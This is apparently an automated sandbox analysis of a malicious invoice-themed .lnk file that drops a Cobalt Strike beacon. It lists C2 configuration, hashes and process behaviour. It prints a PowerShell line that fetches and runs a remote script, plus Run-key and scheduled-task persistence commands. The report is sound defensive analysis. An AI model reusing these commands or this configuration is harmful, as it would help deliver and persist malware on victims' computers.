Analysis
max time kernel: 123s
max time network: 139s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
submitted: 06-02-2023 16:45
Static task: static1
Behavioral task: behavioral1
  Sample: Overdue_Invoice_2023.pdf.lnk
  Resource: win7-20220901-en
Behavioral task: behavioral2
  Sample: Overdue_Invoice_2023.pdf.lnk
  Resource: win10v2004-20220812-en
General
Target: Overdue_Invoice_2023.pdf.lnk
Size: 1KB
MD5: 65247221e9addff22b50070ba1893bb6
SHA1: e373bac187d3faeba2d13cb5cf284b79c10f7d0c
SHA256: 9e9262ab44b3df0478357a790aa39abae9217e74349758e39db4bd7064597875
SHA512: a1a864489b98ddee67c21ee9014a6d3e44b1fd8790af9421b9d9515df7e06d6dbafc85b464424a51a48742d035ba25e423f8edb295107df5badc90c17e1babab
Malware Config
Extracted
cobaltstrike
987654321
http://45.12.253.139:443/an.js
-
access_type
512
-
beacon_type
2048
-
host
45.12.253.139,/an.js
-
http_header2
AAAAEAAAABpIb3N0OiBidXNpbmVzc3NlcnZpY2VzLmNvbQAAAAoAAAARQ29ubmVjdGlvbjogY2xvc2UAAAAKAAAAGUFjY2VwdC1FbmNvZGluZzogZ3ppcCwgYnIAAAAKAAAAL0NvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkAAAABwAAAAEAAAANAAAAAwAAAAIAAAAIZGV0YWlscz0AAAAEAAAABwAAAAAAAAADAAAAAgAAAA5fX3Nlc3Npb25fX2lkPQAAAAYAAAAGQ29va2llAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
-
http_method1
GET
-
http_method2
POST
-
jitter
9472
-
polling_time
55991
-
port_number
443
-
sc_process32
%windir%\syswow64\dllhost.exe
-
sc_process64
%windir%\sysnative\dllhost.exe
-
state_machine
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCMEuNG3asVOp+bgSmSog10bB55R9e+aj5dF2sVbnRjA/dTkltRdDD0DdF5vJh/gURBikZ4FxqqmfqR2SPAheOzDDrYvV7ScpwPkZe8IUd/DbJmPs30ST9SGHn+eLjTQQEU+I142t7yTsO7HCKf1CTDMHfS3PNoz3V8ivNRwL1aiQIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
unknown1
9.63976192e+08
-
unknown2
AAAABAAAAAIAAANxAAAAAwAAAA0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
uri
/ch
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/42.0.2311.135
-
watermark
987654321
Signatures
-
Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes: RuntimeBroker.exe
description            pid   process            target process
PID 3392 created 2556  3392  RuntimeBroker.exe  Explorer.EXE
PID 3392 created 2556  3392  RuntimeBroker.exe  Explorer.EXE
-
Blocklisted process makes network request 2 IoCs
Processes: powershell.exe, powershell.exe
flow  pid   process
16    1152  powershell.exe
19    4652  powershell.exe
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes: cmd.exe
description        ioc                                                                                                    process
Key value queried  \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation  cmd.exe
-
Executes dropped EXE 1 IoCs
Processes: RuntimeBroker.exe
pid   process
3392  RuntimeBroker.exe
-
Loads dropped DLL 1 IoCs
Processes: RuntimeBroker.exe
pid   process
3392  RuntimeBroker.exe
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes: reg.exe
description      ioc                                                                                                                  process
Key created      \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows\CurrentVersion\Run           reg.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftLibrary = "powershell.exe -noP -sta -w 1 Set-Location -Path $env:Public\\Libraries\\MicrosoftLibrary; Start-Process $env:Public\\Libraries\\MicrosoftLibrary\\RuntimeBroker.exe\""  reg.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes: AcroRd32.exe
description        ioc                                                               process
Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0       AcroRd32.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz  AcroRd32.exe
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies Internet Explorer settings 1 IoCs
Processes: AcroRd32.exe
description  ioc                                                                                                                                       process
Key created  \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION  AcroRd32.exe
-
Modifies registry class 1 IoCs
Processes: powershell.exe
description  ioc                                                                                process
Key created  \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings  powershell.exe
-
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 22 IoCs
Processes: powershell.exe, powershell.exe, RuntimeBroker.exe, AcroRd32.exe
pid   process            entries
1152  powershell.exe     2
4652  powershell.exe     2
3392  RuntimeBroker.exe  2
2764  AcroRd32.exe       16
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
Processes: RuntimeBroker.exe
pid   process            entries
3392  RuntimeBroker.exe  2
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes: powershell.exe, powershell.exe
description              pid   process
Token: SeDebugPrivilege  1152  powershell.exe
Token: SeDebugPrivilege  4652  powershell.exe
-
Suspicious use of FindShellTrayWindow 1 IoCs
Processes: AcroRd32.exe
pid   process
2764  AcroRd32.exe
-
Suspicious use of SetWindowsHookEx 6 IoCs
Processes: AcroRd32.exe
pid   process       entries
2764  AcroRd32.exe  6
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes: cmd.exe, powershell.exe, powershell.exe, AcroRd32.exe, RdrCEF.exe
description                       pid   process         target process  entries
PID 956 wrote to memory of 1152   956   cmd.exe         powershell.exe  3
PID 1152 wrote to memory of 4652  1152  powershell.exe  powershell.exe  3
PID 4652 wrote to memory of 2764  4652  powershell.exe  AcroRd32.exe    3
PID 4652 wrote to memory of 2316  4652  powershell.exe  attrib.exe      3
PID 2764 wrote to memory of 1440  2764  AcroRd32.exe    RdrCEF.exe      3
PID 1440 wrote to memory of 3084  1440  RdrCEF.exe      RdrCEF.exe      41
PID 1440 wrote to memory of 4516  1440  RdrCEF.exe      RdrCEF.exe      8
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\system32\cmd.exe (depth 1)
Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\Overdue_Invoice_2023.pdf.lnk
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 2)
Command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 Invoke-WebRequest 'http://billingservice.hopto.org/UY7G6S/f4Ag4.txt' -UseBasicParsing | Select-Object -Expand Content | powershell
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 3)
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe (depth 4)
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\Invoice.pdf"
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (depth 5)
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (depth 6)
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=FA3F0DA423D58F000F00BB4C8644823C --mojo-platform-channel-handle=1732 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (depth 6)
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=E1A1D12CB97133028473753CE707BFB7 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=E1A1D12CB97133028473753CE707BFB7 --renderer-client-id=2 --mojo-platform-channel-handle=1724 --allow-no-sandbox-job /prefetch:1
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (depth 6)
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=3267DEC68BC5B289D34F6968C47867D3 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=3267DEC68BC5B289D34F6968C47867D3 --renderer-client-id=4 --mojo-platform-channel-handle=2152 --allow-no-sandbox-job /prefetch:1
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (depth 6)
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=322335C1F8CBAA6E215F2FBE75B5A4EF --mojo-platform-channel-handle=2540 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (depth 6)
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=07F591F1868D2CD43F73208616567444 --mojo-platform-channel-handle=2864 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (depth 6)
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=43A37E805A03BCF90F1ACE7814341232 --mojo-platform-channel-handle=2796 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
Command line: "C:\Windows\system32\attrib.exe" +h C:\Users\Admin\AppData\Local\Temp\a43ed813-5e6c-4d34-81fb-5c8d7c1b5ecc
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\a43ed813-5e6c-4d34-81fb-5c8d7c1b5ecc\RuntimeBroker.exe (depth 4)
Command line: "C:\Users\Admin\AppData\Local\Temp\a43ed813-5e6c-4d34-81fb-5c8d7c1b5ecc\RuntimeBroker.exe"
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
-
C:\Windows\System32\cmd.exe (depth 5)
Command line: /C reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MicrosoftLibrary /t REG_SZ /d "powershell.exe -noP -sta -w 1 Set-Location -Path $env:Public\Libraries\MicrosoftLibrary; Start-Process $env:Public\Libraries\MicrosoftLibrary\RuntimeBroker.exe"" /f
-
C:\Windows\system32\reg.exe (depth 6)
Command line: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MicrosoftLibrary /t REG_SZ /d "powershell.exe -noP -sta -w 1 Set-Location -Path $env:Public\Libraries\MicrosoftLibrary; Start-Process $env:Public\Libraries\MicrosoftLibrary\RuntimeBroker.exe"" /f
- Adds Run key to start application
- Modifies registry key
-
C:\Windows\System32\schtasks.exe (depth 5)
Command line: /F /Create /TN Microsoft_Library /sc minute /MO 80 /TR "powershell.exe -WindowStyle hidden -noP -sta -w 1 Set-Location -Path $env:Public\Libraries\MicrosoftLibrary; Start-Process $env:Public\Libraries\MicrosoftLibrary\RuntimeBroker.exe
- Creates scheduled task(s)
-
C:\Windows\Explorer.EXE (depth 1)
Command line: C:\Windows\Explorer.EXE
-
C:\windows\system32\wermgr.exe (depth 2)
Command line: "C:\windows\system32\wermgr.exe"
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize: 2KB
MD5: f26d40f3fe3b07202462281e3520a8a5
SHA1: 38c528ce4457b2bb1fd9aa18597275e4ca6492ef
SHA256: a556110b4c51077cba0f523c08060bb41b3380751311f47f3da03de9cf20bf84
SHA512: 2a9af331837bc09e21f06aab4b6ad2a532defd5e0719fe42ea73e5cd44e6262eb2f8df46c07b843d46d457737eceec716829f3a3f7a5fa94282f420ddaed5de4
-
C:\Users\Admin\AppData\Local\Temp\a43ed813-5e6c-4d34-81fb-5c8d7c1b5ecc\RuntimeBroker.exe
Filesize: 100KB
MD5: ba4cfe6461afa1004c52f19c8f2169dc
SHA1: ab8539ef6b2a93ff9589dec4b34a0257b6296c92
SHA256: e86870769ee6c797e09457bd99c58d9bf2303cf0193a24ef9b1222c2c3daf628
SHA512: 2c5190d7609767237311260f241c619b82434ca640f396bb9710d356286844f82f320f9e05525a38707f2a52977790c0c3e2a217b36a7f0095a87c138b939af0
-
C:\Users\Admin\AppData\Local\Temp\a43ed813-5e6c-4d34-81fb-5c8d7c1b5ecc\UMPDC.dll
Filesize: 391KB
MD5: 1570c92c1c5f039c438295ac68ff7e82
SHA1: 3ee6c1d3582361e8af4efec44b1d1420494ab728
SHA256: b41b4e32607a4e21593332da63ce1bcf9c1d43f8f6754789a43bea7428833ea4
SHA512: fbf28062d81538f814e1a615caf9993aa24e54fd0b7ff84ead7e22002bac0a4c866d334fd445d6c7844289a7310e82a0febd07d7f02536ea51d11f9f884e4992
-
C:\Users\Admin\AppData\Local\Temp\a43ed813-5e6c-4d34-81fb-5c8d7c1b5ecc\info.txt
Filesize: 174KB
MD5: 84b90b27b759c98f05d35e2936939ea2
SHA1: 0a398991b1559455da5333b696da112af07f028e
SHA256: 161854614e6405d6899e19409cee5fc8b08fc08a0c52c208593c059f93b869f8
SHA512: b1aa38152af47a156a426794d2d2a4560a736ff7447a54327df629bb9e09c8a22d54360615dc73ba4ed435c188a2b07d13962b6823a30bc1a8c0647d0e64e564
-
C:\Users\Admin\AppData\Local\Temp\a43ed813-5e6c-4d34-81fb-5c8d7c1b5ecc\umpdc.dll
Filesize: 391KB
MD5: 1570c92c1c5f039c438295ac68ff7e82
SHA1: 3ee6c1d3582361e8af4efec44b1d1420494ab728
SHA256: b41b4e32607a4e21593332da63ce1bcf9c1d43f8f6754789a43bea7428833ea4
SHA512: fbf28062d81538f814e1a615caf9993aa24e54fd0b7ff84ead7e22002bac0a4c866d334fd445d6c7844289a7310e82a0febd07d7f02536ea51d11f9f884e4992
-
C:\Users\Admin\Downloads\Invoice.pdf
Filesize: 6KB
MD5: 662e6c1a869b8a4abc54a7ed8bc23088
SHA1: c16f1dfa1f2488072d87f100a7d11ecaf90ca9d4
SHA256: 15d2050a1a60c36ae602981ac19e371a6fae40aed0f5aee6334fbcc721e5b140
SHA512: 5bd17a8cbbb0a7a9565d434cfc507213c91bfeac4cea6b7ea0908ec71fbbcf9f3956d1b9b6c9059dbd466f5cfa7efa2948bc338a4331401b4c8be1e5343c9c99
-
memory/816-172-0x0000000000000000-mapping.dmp
-
memory/1152-140-0x0000000006230000-0x000000000624A000-memory.dmp
Filesize: 104KB
-
memory/1152-138-0x0000000005D30000-0x0000000005D4E000-memory.dmp
Filesize: 120KB
-
memory/1152-133-0x0000000004990000-0x00000000049C6000-memory.dmp
Filesize: 216KB
-
memory/1152-132-0x0000000000000000-mapping.dmp
-
memory/1152-137-0x0000000005710000-0x0000000005776000-memory.dmp
Filesize: 408KB
-
memory/1152-134-0x0000000005000000-0x0000000005628000-memory.dmp
Filesize: 6.2MB
-
memory/1152-135-0x0000000004E80000-0x0000000004EA2000-memory.dmp
Filesize: 136KB
-
memory/1152-136-0x00000000056A0000-0x0000000005706000-memory.dmp
Filesize: 408KB
-
memory/1152-139-0x0000000007590000-0x0000000007C0A000-memory.dmp
Filesize: 6.5MB
-
memory/1240-187-0x0000000000000000-mapping.dmp
-
memory/1440-157-0x0000000000000000-mapping.dmp
-
memory/2316-156-0x0000000000000000-mapping.dmp
-
memory/2764-147-0x0000000000000000-mapping.dmp
-
memory/3084-159-0x0000000000000000-mapping.dmp
-
memory/3392-186-0x00007FF9239B0000-0x00007FF923BA5000-memory.dmp
Filesize: 2.0MB
-
memory/3392-174-0x0000000000000000-mapping.dmp
-
memory/3644-184-0x0000000000000000-mapping.dmp
-
memory/3696-189-0x0000000000000000-mapping.dmp
-
memory/3936-181-0x00000279FE480000-0x00000279FE4C4000-memory.dmp
Filesize: 272KB
-
memory/3936-180-0x0000000000000000-mapping.dmp
-
memory/3936-182-0x00000279FE740000-0x00000279FE7BE000-memory.dmp
Filesize: 504KB
-
memory/4316-192-0x0000000000000000-mapping.dmp
-
memory/4468-185-0x0000000000000000-mapping.dmp
-
memory/4516-162-0x0000000000000000-mapping.dmp
-
memory/4652-143-0x0000000006FD0000-0x0000000007046000-memory.dmp
Filesize: 472KB
-
memory/4652-150-0x00000000709C0000-0x0000000070A0C000-memory.dmp
Filesize: 304KB
-
memory/4652-155-0x0000000007F40000-0x0000000007F4A000-memory.dmp
Filesize: 40KB
-
memory/4652-154-0x0000000007F20000-0x0000000007F32000-memory.dmp
Filesize: 72KB
-
memory/4652-153-0x0000000007E80000-0x0000000007E8A000-memory.dmp
Filesize: 40KB
-
memory/4652-152-0x00000000076A0000-0x00000000076BE000-memory.dmp
Filesize: 120KB
-
memory/4652-151-0x0000000070B30000-0x0000000070E84000-memory.dmp
Filesize: 3.3MB
-
memory/4652-141-0x0000000000000000-mapping.dmp
-
memory/4652-149-0x0000000007D50000-0x0000000007D82000-memory.dmp
Filesize: 200KB
-
memory/4652-146-0x0000000008300000-0x00000000088A4000-memory.dmp
Filesize: 5.6MB
-
memory/4652-145-0x0000000007310000-0x0000000007332000-memory.dmp
Filesize: 136KB
-
memory/4652-144-0x0000000007380000-0x0000000007416000-memory.dmp
Filesize: 600KB
-
memory/4652-142-0x0000000006E70000-0x0000000006EB4000-memory.dmp
Filesize: 272KB
-
memory/4872-167-0x0000000000000000-mapping.dmp